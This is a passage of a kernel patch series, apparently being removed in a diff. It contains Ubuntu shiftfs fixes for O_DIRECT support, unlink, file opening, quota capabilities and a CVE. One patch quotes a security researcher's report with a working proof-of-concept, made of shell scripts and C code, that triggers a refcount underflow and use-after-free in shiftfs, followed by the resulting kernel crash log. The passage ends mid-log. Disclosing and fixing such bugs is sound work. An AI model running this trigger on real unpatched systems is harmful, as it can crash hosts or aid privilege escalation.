!shiftfs_passthrough_ioctls(file->f_path.dentry->d_sb->s_fs_info)) - return -ENOIOCTLCMD; - } --- -2.39.2 - -From 
cd66a65bbea66683404adadd7d61ec02d04ac21a Mon Sep 17 00:00:00 2001 -From: Christian Brauner <christian@brauner.io> -Date: Fri, 19 Jul 2019 17:50:46 +0200 -Subject: [PATCH] UBUNTU: SAUCE: shiftfs: add O_DIRECT support -Cc: mpagano@gentoo.org - -BugLink: https://bugs.launchpad.net/bugs/1837223 - -This enabled O_DIRECT support for shiftfs if the underlay supports it. - -Currently shiftfs does not handle O_DIRECT if the underlay supports it. -This is blocking dqlite - an essential part of LXD - from profiting from -the performance benefits of O_DIRECT on suitable filesystems when used -with async io such as aio or io_uring. -Overlayfs cannot support this directly since the upper filesystem in -overlay can be any filesystem. So if the upper filesystem does not -support O_DIRECT but the lower filesystem does you're out of luck. -Shiftfs does not suffer from the same problem since there is not concept -of an upper filesystem in the same way that overlayfs has it. -Essentially, shiftfs is a transparent shim relaying everything to the -underlay while overlayfs' upper layer is not (completely). - -Cc: Seth Forshee <seth.forshee@canonical.com> -Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com> -Signed-off-by: Seth Forshee <seth.forshee@canonical.com> -Signed-off-by: Mike Pagano <mpagano@gentoo.org> ---- - fs/shiftfs.c | 3 +++ - 1 file changed, 3 insertions(+) - -diff --git a/fs/shiftfs.c b/fs/shiftfs.c -index 49f6714e9f95..addaa6e21e57 100644 ---- a/fs/shiftfs.c -+++ b/fs/shiftfs.c -@@ -1126,6 +1126,9 @@ static int shiftfs_open(struct inode *inode, struct file *file) - } - - file->private_data = file_info; -+ /* For O_DIRECT dentry_open() checks f_mapping->a_ops->direct_IO. 
*/ -+ file->f_mapping = realfile->f_mapping; -+ - file_info->realfile = realfile; - return 0; - } --- -2.39.2 - -From 772a8ea3a85f0530a76bc8dbe4e91de92aa35180 Mon Sep 17 00:00:00 2001 -From: Christian Brauner <christian@brauner.io> -Date: Fri, 19 Jul 2019 17:50:47 +0200 -Subject: [PATCH] UBUNTU: SAUCE: shiftfs: pass correct point down -Cc: mpagano@gentoo.org - -BugLink: https://bugs.launchpad.net/bugs/1837231 - -This used to pass an unsigned long to copy_from_user() instead of a -void __user * pointer. This will produce warning with a sufficiently -advanced compiler. - -Cc: Seth Forshee <seth.forshee@canonical.com> -Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com> -Signed-off-by: Seth Forshee <seth.forshee@canonical.com> -Signed-off-by: Mike Pagano <mpagano@gentoo.org> ---- - fs/shiftfs.c | 2 +- - 1 file changed, 1 insertion(+), 1 deletion(-) - -diff --git a/fs/shiftfs.c b/fs/shiftfs.c -index addaa6e21e57..9006201c243d 100644 ---- a/fs/shiftfs.c -+++ b/fs/shiftfs.c -@@ -1529,7 +1529,7 @@ static bool in_ioctl_whitelist(int flag, unsigned long arg) - case BTRFS_IOC_SUBVOL_GETFLAGS: - return true; - case BTRFS_IOC_SUBVOL_SETFLAGS: -- if (copy_from_user(&flags, arg, sizeof(flags))) -+ if (copy_from_user(&flags, argp, sizeof(flags))) - return false; - - if (flags & ~BTRFS_SUBVOL_RDONLY) --- -2.39.2 - -From ca8b1596f4e2a5a3c8ee7b7cb45d4703b329c891 Mon Sep 17 00:00:00 2001 -From: Christian Brauner <christian.brauner@ubuntu.com> -Date: Thu, 29 Aug 2019 20:45:07 +0200 -Subject: [PATCH] UBUNTU: SAUCE: shiftfs: fix buggy unlink logic -Cc: mpagano@gentoo.org - -BugLink: https://bugs.launchpad.net/bugs/1841977 - -The way we messed with setting i_nlink was brittle and wrong. We used to -set the i_nlink of the shiftfs dentry to be deleted to the i_nlink count -of the underlay dentry of the directory it resided in which makes no -sense whatsoever. We also missed drop_nlink() which is crucial since -i_nlink affects whether a dentry is cleaned up on dput(). 
-With this I cannot reproduce the bug anymore where shiftfs misleads zfs -into believing that a deleted file can not be removed from disk because -it is still referenced. - -Fixes: commit 87011da41961 ("shiftfs: rework and extend") -Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com> -Signed-off-by: Seth Forshee <seth.forshee@canonical.com> -Signed-off-by: Mike Pagano <mpagano@gentoo.org> ---- - fs/shiftfs.c | 15 ++++++++++----- - 1 file changed, 10 insertions(+), 5 deletions(-) - -diff --git a/fs/shiftfs.c b/fs/shiftfs.c -index 9006201c243d..e80db9480b5c 100644 ---- a/fs/shiftfs.c -+++ b/fs/shiftfs.c -@@ -585,6 +585,7 @@ static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir) - { - struct dentry *lowerd = dentry->d_fsdata; - struct inode *loweri = dir->i_private; -+ struct inode *inode = d_inode(dentry); - int err; - const struct cred *oldcred; - -@@ -594,15 +595,19 @@ static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir) - err = vfs_rmdir(loweri, lowerd); - else - err = vfs_unlink(loweri, lowerd, NULL); -- inode_unlock(loweri); - revert_creds(oldcred); - -- shiftfs_copyattr(loweri, dir); -- set_nlink(d_inode(dentry), loweri->i_nlink); -- if (!err) -+ if (!err) { - d_drop(dentry); - -- set_nlink(dir, loweri->i_nlink); -+ if (rmdir) -+ clear_nlink(inode); -+ else -+ drop_nlink(inode); -+ } -+ inode_unlock(loweri); -+ -+ shiftfs_copyattr(loweri, dir); - - return err; - } --- -2.39.2 - -From 81445d2871aef886eabb56c7f124d491f445fcc7 Mon Sep 17 00:00:00 2001 -From: Christian Brauner <christian.brauner@ubuntu.com> -Date: Fri, 30 Aug 2019 14:14:31 +0200 -Subject: [PATCH] UBUNTU: SAUCE: shiftfs: mark slab objects - SLAB_RECLAIM_ACCOUNT -Cc: mpagano@gentoo.org - -BugLink: https://bugs.launchpad.net/bugs/1842059 - -Shiftfs does not mark it's slab cache as reclaimable. While this is not -a big deal it is not nice to the kernel in general. The shiftfs cache is -not so important that it can't be reclaimed. 
- -Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com> -Signed-off-by: Seth Forshee <seth.forshee@canonical.com> -Signed-off-by: Mike Pagano <mpagano@gentoo.org> ---- - fs/shiftfs.c | 2 +- - 1 file changed, 1 insertion(+), 1 deletion(-) - -diff --git a/fs/shiftfs.c b/fs/shiftfs.c -index e80db9480b5c..a21cb473e000 100644 ---- a/fs/shiftfs.c -+++ b/fs/shiftfs.c -@@ -2108,7 +2108,7 @@ static int __init shiftfs_init(void) - { - shiftfs_file_info_cache = kmem_cache_create( - "shiftfs_file_info_cache", sizeof(struct shiftfs_file_info), 0, -- SLAB_HWCACHE_ALIGN | SLAB_ACCOUNT | SLAB_MEM_SPREAD, NULL); -+ SLAB_RECLAIM_ACCOUNT | SLAB_HWCACHE_ALIGN | SLAB_ACCOUNT | SLAB_MEM_SPREAD, NULL); - if (!shiftfs_file_info_cache) - return -ENOMEM; - --- -2.39.2 - -From 3d0e90c90e6b1b915b9ac760c865529b28cf1cdd Mon Sep 17 00:00:00 2001 -From: Christian Brauner <christian.brauner@ubuntu.com> -Date: Wed, 2 Oct 2019 09:57:14 +0200 -Subject: [PATCH] UBUNTU: SAUCE: shiftfs: rework how shiftfs opens files -Cc: mpagano@gentoo.org - -BugLink: https://bugs.launchpad.net/bugs/1846265 - -This commit simplifies how shiftfs open files, both regular files an -directories. - -In the first iteration, we implemented a kmem cache for struct -shiftfs_file_info which stashed away a struct path and the struct file -for the underlay. The path however was never used anywhere so the struct -shiftfs_file_info and therefore the whole kmem cache can go away. -Instead we move to the same model as overlayfs and just stash away the -struct file for the underlay in file->private_data of the shiftfs struct -file. -Addtionally, we split the .open method for files and directories. -Similar to overlayfs .open for regular files uses open_with_fake_path() -which ensures that it doesn't contribute to the open file count (since -this would mean we'd count double). The .open method for directories -however used dentry_open() which contributes to the open file count. 
- -The basic logic for opening files is unchanged. The main point is to -ensure that a reference to the underlay's dentry is kept through struct -path. - -Various bits and pieces of this were cooked up in discussions Seth and I -had in Paris. - -Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com> -Signed-off-by: Seth Forshee <seth.forshee@canonical.com> -Signed-off-by: Mike Pagano <mpagano@gentoo.org> ---- - fs/shiftfs.c | 105 +++++++++++++++++++++++---------------------------- - 1 file changed, 47 insertions(+), 58 deletions(-) - -diff --git a/fs/shiftfs.c b/fs/shiftfs.c -index a21cb473e000..55bb32b611f2 100644 ---- a/fs/shiftfs.c -+++ b/fs/shiftfs.c -@@ -31,13 +31,6 @@ struct shiftfs_super_info { - unsigned int passthrough_mark; - }; - --struct shiftfs_file_info { -- struct path realpath; -- struct file *realfile; --}; -- --struct kmem_cache *shiftfs_file_info_cache; -- - static void shiftfs_fill_inode(struct inode *inode, unsigned long ino, - umode_t mode, dev_t dev, struct dentry *dentry); - -@@ -1042,21 +1035,21 @@ static const struct inode_operations shiftfs_symlink_inode_operations = { - }; - - static struct file *shiftfs_open_realfile(const struct file *file, -- struct path *realpath) -+ struct inode *realinode) - { -- struct file *lowerf; -- const struct cred *oldcred; -+ struct file *realfile; -+ const struct cred *old_cred; - struct inode *inode = file_inode(file); -- struct inode *loweri = realpath->dentry->d_inode; -+ struct dentry *lowerd = file->f_path.dentry->d_fsdata; - struct shiftfs_super_info *info = inode->i_sb->s_fs_info; -+ struct path realpath = { .mnt = info->mnt, .dentry = lowerd }; - -- oldcred = shiftfs_override_creds(inode->i_sb); -- /* XXX: open_with_fake_path() not gauranteed to stay around, if -- * removed use dentry_open() */ -- lowerf = open_with_fake_path(realpath, file->f_flags, loweri, info->creator_cred); -- revert_creds(oldcred); -+ old_cred = shiftfs_override_creds(inode->i_sb); -+ realfile = 
open_with_fake_path(&realpath, file->f_flags, realinode, -+ info->creator_cred); -+ revert_creds(old_cred); - -- return lowerf; -+ return realfile; - } - - #define SHIFTFS_SETFL_MASK (O_APPEND | O_NONBLOCK | O_NDELAY | O_DIRECT) -@@ -1096,8 +1089,7 @@ static int shiftfs_change_flags(struct file *file, unsigned int flags) - - static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd) - { -- struct shiftfs_file_info *file_info = file->private_data; -- struct file *realfile = file_info->realfile; -+ struct file *realfile = file->private_data; - - lowerfd->flags = 0; - lowerfd->file = realfile; -@@ -1111,51 +1103,57 @@ static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd) - - static int shiftfs_open(struct inode *inode, struct file *file) - { -- struct shiftfs_super_info *ssi = inode->i_sb->s_fs_info; -- struct shiftfs_file_info *file_info; - struct file *realfile; -- struct path *realpath; - -- file_info = kmem_cache_zalloc(shiftfs_file_info_cache, GFP_KERNEL); -- if (!file_info) -- return -ENOMEM; -- -- realpath = &file_info->realpath; -- realpath->mnt = ssi->mnt; -- realpath->dentry = file->f_path.dentry->d_fsdata; -- -- realfile = shiftfs_open_realfile(file, realpath); -- if (IS_ERR(realfile)) { -- kmem_cache_free(shiftfs_file_info_cache, file_info); -+ realfile = shiftfs_open_realfile(file, inode->i_private); -+ if (IS_ERR(realfile)) - return PTR_ERR(realfile); -- } - -- file->private_data = file_info; -+ file->private_data = realfile; - /* For O_DIRECT dentry_open() checks f_mapping->a_ops->direct_IO. 
*/ - file->f_mapping = realfile->f_mapping; - -- file_info->realfile = realfile; - return 0; - } - --static int shiftfs_release(struct inode *inode, struct file *file) -+static int shiftfs_dir_open(struct inode *inode, struct file *file) - { -- struct shiftfs_file_info *file_info = file->private_data; -+ struct file *realfile; -+ const struct cred *oldcred; -+ struct dentry *lowerd = file->f_path.dentry->d_fsdata; -+ struct shiftfs_super_info *info = inode->i_sb->s_fs_info; -+ struct path realpath = { .mnt = info->mnt, .dentry = lowerd }; -+ -+ oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb); -+ realfile = dentry_open(&realpath, file->f_flags | O_NOATIME, -+ info->creator_cred); -+ revert_creds(oldcred); -+ if (IS_ERR(realfile)) -+ return PTR_ERR(realfile); - -- if (file_info) { -- if (file_info->realfile) -- fput(file_info->realfile); -+ file->private_data = realfile; - -- kmem_cache_free(shiftfs_file_info_cache, file_info); -- } -+ return 0; -+} -+ -+static int shiftfs_release(struct inode *inode, struct file *file) -+{ -+ struct file *realfile = file->private_data; -+ -+ if (realfile) -+ fput(realfile); - - return 0; - } - -+static int shiftfs_dir_release(struct inode *inode, struct file *file) -+{ -+ return shiftfs_release(inode, file); -+} -+ - static loff_t shiftfs_dir_llseek(struct file *file, loff_t offset, int whence) - { -- struct shiftfs_file_info *file_info = file->private_data; -- struct file *realfile = file_info->realfile; -+ struct file *realfile = file->private_data; - - return vfs_llseek(realfile, offset, whence); - } -@@ -1274,8 +1272,7 @@ static int shiftfs_fsync(struct file *file, loff_t start, loff_t end, - - static int shiftfs_mmap(struct file *file, struct vm_area_struct *vma) - { -- struct shiftfs_file_info *file_info = file->private_data; -- struct file *realfile = file_info->realfile; -+ struct file *realfile = file->private_data; - const struct cred *oldcred; - int ret; - -@@ -1671,8 +1668,7 @@ static int 
shiftfs_iterate_shared(struct file *file, struct dir_context *ctx) - { - const struct cred *oldcred; - int err = -ENOTDIR; -- struct shiftfs_file_info *file_info = file->private_data; -- struct file *realfile = file_info->realfile; -+ struct file *realfile = file->private_data; - - oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb); - err = iterate_dir(realfile, ctx); -@@ -1698,13 +1694,13 @@ const struct file_operations shiftfs_file_operations = { - }; - - const struct file_operations shiftfs_dir_operations = { -+ .open = shiftfs_dir_open, -+ .release = shiftfs_dir_release, - .compat_ioctl = shiftfs_compat_ioctl, - .fsync = shiftfs_fsync, - .iterate_shared = shiftfs_iterate_shared, - .llseek = shiftfs_dir_llseek, -- .open = shiftfs_open, - .read = generic_read_dir, -- .release = shiftfs_release, - .unlocked_ioctl = shiftfs_ioctl, - }; - -@@ -2106,19 +2102,12 @@ static struct file_system_type shiftfs_type = { - - static int __init shiftfs_init(void) - { -- shiftfs_file_info_cache = kmem_cache_create( -- "shiftfs_file_info_cache", sizeof(struct shiftfs_file_info), 0, -- SLAB_RECLAIM_ACCOUNT | SLAB_HWCACHE_ALIGN | SLAB_ACCOUNT | SLAB_MEM_SPREAD, NULL); -- if (!shiftfs_file_info_cache) -- return -ENOMEM; -- - return register_filesystem(&shiftfs_type); - } - - static void __exit shiftfs_exit(void) - { - unregister_filesystem(&shiftfs_type); -- kmem_cache_destroy(shiftfs_file_info_cache); - } - - MODULE_ALIAS_FS("shiftfs"); --- -2.39.2 - -From 0afd6d19d12a42d7905110a41cdb3815e023467c Mon Sep 17 00:00:00 2001 -From: Seth Forshee <seth.forshee@canonical.com> -Date: Wed, 6 Nov 2019 09:38:57 -0600 -Subject: [PATCH] UBUNTU: SAUCE: shiftfs: Restore vm_file value when lower fs - mmap fails -Cc: mpagano@gentoo.org - -BugLink: https://bugs.launchpad.net/bugs/1850994 - -shiftfs_mmap() overwrites vma->vm_file before calling the lower -filesystem mmap but does not restore the original value on -failure. 
This means it is giving a pointer to the lower fs file -back to the caller with no reference, which is a bad practice. -However, it does not lead to any issues with upstream kernels as -no caller accesses vma->vm_file after call_mmap(). - -With the aufs patches applied the story is different. Whereas -mmap_region() previously fput a local variable containing the -file it assigned to vm_file, it now calls vma_fput() which will -fput vm_file, for which it has no reference, and the reference -for the original vm_file is not put. - -Fix this by restoring vma->vm_file to the original value when the -mmap call into the lower fs fails. - -CVE-2019-15794 - -Reported-by: Jann Horn <jannh@google.com> -Signed-off-by: Seth Forshee <seth.forshee@canonical.com> -Signed-off-by: Mike Pagano <mpagano@gentoo.org> ---- - fs/shiftfs.c | 15 +++++++++++---- - 1 file changed, 11 insertions(+), 4 deletions(-) - -diff --git a/fs/shiftfs.c b/fs/shiftfs.c -index 55bb32b611f2..57d84479026b 100644 ---- a/fs/shiftfs.c -+++ b/fs/shiftfs.c -@@ -1289,10 +1289,17 @@ static int shiftfs_mmap(struct file *file, struct vm_area_struct *vma) - - shiftfs_file_accessed(file); - -- if (ret) -- fput(realfile); /* Drop refcount from new vm_file value */ -- else -- fput(file); /* Drop refcount from previous vm_file value */ -+ if (ret) { -+ /* -+ * Drop refcount from new vm_file value and restore original -+ * vm_file value -+ */ -+ vma->vm_file = file; -+ fput(realfile); -+ } else { -+ /* Drop refcount from previous vm_file value */ -+ fput(file); -+ } - - return ret; - } --- -2.39.2 - -From 5b548337ff886dfb00ec3a142693226394673126 Mon Sep 17 00:00:00 2001 -From: Christian Brauner <christian.brauner@ubuntu.com> -Date: Wed, 23 Oct 2019 14:22:28 +0200 -Subject: [PATCH] UBUNTU: SAUCE: shiftfs: setup correct s_maxbytes limit -Cc: mpagano@gentoo.org - -BugLink: https://bugs.launchpad.net/bugs/1849482 - -Set the s_maxbytes limit to MAX_LFS_FILESIZE. 
-Currently shiftfs limits the maximum size for fallocate() needlessly -causing calls such as fallocate --length 2GB ./file to fail. This -limitation is arbitrary since it's not caused by the underlay but -rather by shiftfs itself capping the s_maxbytes. This causes bugs such -as the one reported in [1]. - -[1]: https://github.com/lxc/lxd/issues/6333 -Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com> -Acked-by: Connor Kuehl <connor.kuehl@canonical.com> -Acked-by: Stefan Bader <stefan.bader@canonical.com> -Signed-off-by: Seth Forshee <seth.forshee@canonical.com> -Signed-off-by: Mike Pagano <mpagano@gentoo.org> ---- - fs/shiftfs.c | 1 + - 1 file changed, 1 insertion(+) - -diff --git a/fs/shiftfs.c b/fs/shiftfs.c -index 57d84479026b..6a2b5e3d0d53 100644 ---- a/fs/shiftfs.c -+++ b/fs/shiftfs.c -@@ -2064,6 +2064,7 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data, - inode->i_private = dentry->d_inode; - - sb->s_magic = SHIFTFS_MAGIC; -+ sb->s_maxbytes = MAX_LFS_FILESIZE; - sb->s_op = &shiftfs_super_ops; - sb->s_xattr = shiftfs_xattr_handlers; - sb->s_d_op = &shiftfs_dentry_ops; --- -2.39.2 - -From fa7001e866380a4d2f45022295b6db1fd0cf12c5 Mon Sep 17 00:00:00 2001 -From: Christian Brauner <christian.brauner@ubuntu.com> -Date: Wed, 23 Oct 2019 14:23:50 +0200 -Subject: [PATCH] UBUNTU: SAUCE: shiftfs: drop CAP_SYS_RESOURCE from effective - capabilities -Cc: mpagano@gentoo.org - -BugLink: https://bugs.launchpad.net/bugs/1849483 - -Currently shiftfs allows to exceed project quota and reserved space on -e.g. ext2. See [1] and especially [2] for a bug report. This is very -much not what we want. Quotas and reserved space settings set on the -host need to be respected. The cause for this issue is overriding the -credentials with the superblock creator's credentials whenever we -perform operations such as fallocate() or writes while retaining -CAP_SYS_RESOURCE.
- -The fix is to drop CAP_SYS_RESOURCE from the effective capability set -after we have made a copy of the superblock creator's credential at -superblock creation time. This very likely gives us more security than -we had before and the regression potential seems limited. I would like -to try this approach first before coming up with something potentially -more sophisticated. I don't see why CAP_SYS_RESOURCE should become a -limiting factor in most use-cases. - -[1]: https://github.com/lxc/lxd/issues/6333 -[2]: https://github.com/lxc/lxd/issues/6333#issuecomment-545154838 -Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com> -Acked-by: Connor Kuehl <connor.kuehl@canonical.com> -Acked-by: Stefan Bader <stefan.bader@canonical.com> -Signed-off-by: Seth Forshee <seth.forshee@canonical.com> -Signed-off-by: Mike Pagano <mpagano@gentoo.org> ---- - fs/shiftfs.c | 8 ++++++-- - 1 file changed, 6 insertions(+), 2 deletions(-) - -diff --git a/fs/shiftfs.c b/fs/shiftfs.c -index 6a2b5e3d0d53..0d6ce377b07c 100644 ---- a/fs/shiftfs.c -+++ b/fs/shiftfs.c -@@ -1958,6 +1958,7 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data, - sb->s_flags |= SB_POSIXACL; - - if (sbinfo->mark) { -+ struct cred *cred_tmp; - struct super_block *lower_sb = path.mnt->mnt_sb; - - /* to mark a mount point, must root wrt lower s_user_ns */ -@@ -2012,11 +2013,14 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data, - sbinfo->passthrough_mark = sbinfo->passthrough; - } - -- sbinfo->creator_cred = prepare_creds(); -- if (!sbinfo->creator_cred) { -+ cred_tmp = prepare_creds(); -+ if (!cred_tmp) { - err = -ENOMEM; - goto out_put_path; - } -+ /* Don't override disk quota limits or use reserved space.
*/ -+ cap_lower(cred_tmp->cap_effective, CAP_SYS_RESOURCE); -+ sbinfo->creator_cred = cred_tmp; - } else { - /* - * This leg executes if we're admin capable in the namespace, --- -2.39.2 - -From a73880c13fc011fba13bfbf3197b98500c8c4906 Mon Sep 17 00:00:00 2001 -From: Seth Forshee <seth.forshee@canonical.com> -Date: Fri, 1 Nov 2019 10:41:03 -0500 -Subject: [PATCH] UBUNTU: SAUCE: shiftfs: Fix refcount underflow in btrfs ioctl - handling -Cc: mpagano@gentoo.org - -BugLink: https://bugs.launchpad.net/bugs/1850867 - -shiftfs_btrfs_ioctl_fd_replace() installs an fd referencing a -file from the lower filesystem without taking an additional -reference to that file. After the btrfs ioctl completes this fd -is closed, which then puts a reference to that file, leading to a -refcount underflow. Original bug report and test case from Jann -Horn is below. - -Fix this, and at the sametime simplify the management of the fd -to the lower file for the ioctl. In -shiftfs_btrfs_ioctl_fd_replace(), take the missing reference to -the lower file and set FDPUT_FPUT so that this reference will get -dropped on fdput() in error paths. Do not maintain the struct fd -in the caller, as it the fd installed in the fd table is -sufficient to properly clean up. Finally, remove the fdput() in -shiftfs_btrfs_ioctl_fd_restore() as it is redundant with the -__close_fd() call. - -Original report from Jann Horn: - -In shiftfs_btrfs_ioctl_fd_replace() ("//" comments added by me): - - src = fdget(oldfd); - if (!src.file) - return -EINVAL; - // src holds one reference (assuming multithreaded execution) - - ret = shiftfs_real_fdget(src.file, lfd); - // lfd->file is a file* now, but shiftfs_real_fdget didn't take any - // extra references - fdput(src); - // this drops the only reference we were holding on src, and src was - // the only thing holding a reference to lfd->file. lfd->file may be - // dangling at this point. 
- if (ret) - return ret; - - *newfd = get_unused_fd_flags(lfd->file->f_flags); - if (*newfd < 0) { - // always a no-op - fdput(*lfd); - return *newfd; - } - - fd_install(*newfd, lfd->file); - // fd_install() consumes a counted reference, but we don't hold any - // counted references. so at this point, if lfd->file hasn't been freed - // yet, its refcount is one lower than it ought to be. - - [...] - - // the following code is refcount-neutral, so the refcount stays one too - // low. - if (ret) - shiftfs_btrfs_ioctl_fd_restore(cmd, *lfd, *newfd, arg, v1, v2); - -shiftfs_real_fdget() is implemented as follows: - -static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd) -{ - struct shiftfs_file_info *file_info = file->private_data; - struct file *realfile = file_info->realfile; - - lowerfd->flags = 0; - lowerfd->file = realfile; - - /* Did the flags change since open? */ - if (unlikely(file->f_flags & ~lowerfd->file->f_flags)) - return shiftfs_change_flags(lowerfd->file, file->f_flags); - - return 0; -} - -Therefore, the following PoC will cause reference count overdecrements; I ran it -with SLUB debugging enabled and got the following splat: - -======================================= -user@ubuntu1910vm:~/shiftfs$ cat run.sh -sync -unshare -mUr ./run2.sh -t run2user@ubuntu1910vm:~/shiftfs$ cat run2.sh -set -e - -mkdir -p mnt/tmpfs -mkdir -p mnt/shiftfs -mount -t tmpfs none mnt/tmpfs -mount -t shiftfs -o mark,passthrough=2 mnt/tmpfs mnt/shiftfs -mount|grep shift -touch mnt/tmpfs/foo -gcc -o ioctl ioctl.c -Wall -./ioctl -user@ubuntu1910vm:~/shiftfs$ cat ioctl.c - -int main(void) { - int root = open("mnt/shiftfs", O_RDONLY); - if (root == -1) err(1, "open shiftfs root"); - int foofd = openat(root, "foo", O_RDONLY); - if (foofd == -1) err(1, "open foofd"); - struct btrfs_ioctl_vol_args iocarg = { - .fd = foofd - }; - ioctl(root, BTRFS_IOC_SNAP_CREATE, &iocarg); - sleep(1); - void *map = mmap(NULL, 0x1000, PROT_READ, MAP_SHARED, foofd, 0); - if (map != 
MAP_FAILED) munmap(map, 0x1000); -} -user@ubuntu1910vm:~/shiftfs$ ./run.sh -none on /home/user/shiftfs/mnt/tmpfs type tmpfs (rw,relatime,uid=1000,gid=1000) -/home/user/shiftfs/mnt/tmpfs on /home/user/shiftfs/mnt/shiftfs type shiftfs (rw,relatime,mark,passthrough=2) -[ 183.463452] general protection fault: 0000 [#1] SMP PTI -[ 183.467068] CPU: 1 PID: 2473 Comm: ioctl Not tainted 5.3.0-19-generic #20-Ubuntu -[ 183.472170] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.12.0-1 04/01/2014 -[ 183.476830] RIP: 0010:shiftfs_mmap+0x20/0xd0 [shiftfs] -[ 183.478524] Code: 20 cf 5d c3 c3 0f 1f 44 00 00 0f 1f 44 00 00 55 48 89 e5 41 57 41 56 41 55 41 54 48 8b 87 c8 00 00 00 4c 8b 68 10 49 8b 45 28 <48> 83 78 60 00 0f 84 97 00 00 00 49 89 fc 49 89 f6 48 39 be a0 00 -[ 183.484585] RSP: 0018:ffffae48007c3d40 EFLAGS: 00010206 -[ 183.486290] RAX: 6b6b6b6b6b6b6b6b RBX: ffff93f1fb7908a8 RCX: 7800000000000000 -[ 183.489617] RDX: 8000000000000025 RSI: ffff93f1fb792208 RDI: ffff93f1f69fa400 -[ 183.491975] RBP: ffffae48007c3d60 R08: ffff93f1fb792208 R09: 0000000000000000 -[ 183.494311] R10: ffff93f1fb790888 R11: 00007f1d01d10000 R12: ffff93f1fb7908b0 -[ 183.496675] R13: ffff93f1f69f9900 R14: ffff93f1fb792208 R15: ffff93f22f102e40 -[ 183.499011] FS: 00007f1d01cd1540(0000) GS:ffff93f237a40000(0000) knlGS:0000000000000000 -[ 183.501679] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 -[ 183.503568] CR2: 00007f1d01bc4c10 CR3: 0000000242726001 CR4: 0000000000360ee0 -[ 183.505901] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 -[ 183.508229] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 -[ 183.510580] Call Trace: -[ 183.511396] mmap_region+0x417/0x670 -[ 183.512592] do_mmap+0x3a8/0x580 -[ 183.513655] vm_mmap_pgoff+0xcb/0x120 -[ 183.514863] ksys_mmap_pgoff+0x1ca/0x2a0 -[ 183.516155] __x64_sys_mmap+0x33/0x40 -[ 183.517352] do_syscall_64+0x5a/0x130 -[ 183.518548] entry_SYSCALL_64_after_hwframe+0x44/0xa9 -[ 183.520196] RIP: 0033:0x7f1d01bfaaf6 -[ 
183.521372] Code: 00 00 00 00 f3 0f 1e fa 41 f7 c1 ff 0f 00 00 75 2b 55 48 89 fd 53 89 cb 48 85 ff 74 37 41 89 da 48 89 ef b8 09 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 62 5b 5d c3 0f 1f 80 00 00 00 00 48 8b 05 61 -[ 183.527210] RSP: 002b:00007ffdf50bae98 EFLAGS: 00000246 ORIG_RAX: 0000000000000009 -[ 183.529582] RAX: ffffffffffffffda RBX: 0000000000000001 RCX: 00007f1d01bfaaf6 -[ 183.531811] RDX: 0000000000000001 RSI: 0000000000001000 RDI: 0000000000000000 -[ 183.533999] RBP: 0000000000000000 R08: 0000000000000004 R09: 0000000000000000 -[ 183.536199] R10: 0000000000000001 R11: 0000000000000246 R12: 00005616cf6f5140 -[ 183.538448] R13: 00007ffdf50bbfb0 R14: 0000000000000000 R15: 0000000000000000 -[ 183.540714] Modules linked in: shiftfs intel_rapl_msr intel_rapl_common kvm_intel kvm irqbypass snd_hda_codec_generic ledtrig_audio snd_hda_intel snd_hda_codec snd_hda_core crct10dif_pclmul snd_hwdep crc32_pclmul ghash_clmulni_intel snd_pcm aesni_intel snd_seq_midi snd_seq_midi_event aes_x86_64 crypto_simd snd_rawmidi cryptd joydev input_leds snd_seq glue_helper qxl snd_seq_device snd_timer ttm drm_kms_helper drm snd fb_sys_fops syscopyarea sysfillrect sysimgblt serio_raw qemu_fw_cfg soundcore mac_hid sch_fq_codel parport_pc ppdev lp parport virtio_rng ip_tables x_tables autofs4 hid_generic usbhid hid virtio_net net_failover psmouse ahci i2c_i801 libahci lpc_ich virtio_blk failover -[ 183.560350] ---[ end trace 4a860910803657c2 ]--- -[ 183.561832] RIP: 0010:shiftfs_mmap+0x20/0xd0 [shiftfs] -[ 183.563496] Code: 20 cf 5d c3 c3 0f 1f 44 00 00 0f 1f 44 00 00 55 48 89 e5 41 57 41 56 41 55 41 54 48 8b 87 c8 00 00 00 4c 8b 68 10 49 8b 45 28 <48> 83 78 60 00 0f 84 97 00 00 00 49 89 fc 49 89 f6 48 39 be a0 00 -[ 183.569438] RSP: 0018:ffffae48007c3d40 EFLAGS: 00010206 -[ 183.571102] RAX: 6b6b6b6b6b6b6b6b RBX: ffff93f1fb7908a8 RCX: 7800000000000000 -[ 183.573362] RDX: 8000000000000025 RSI: ffff93f1fb792208 RDI: ffff93f1f69fa400 -[ 183.575655] RBP: ffffae48007c3d60 R08: 
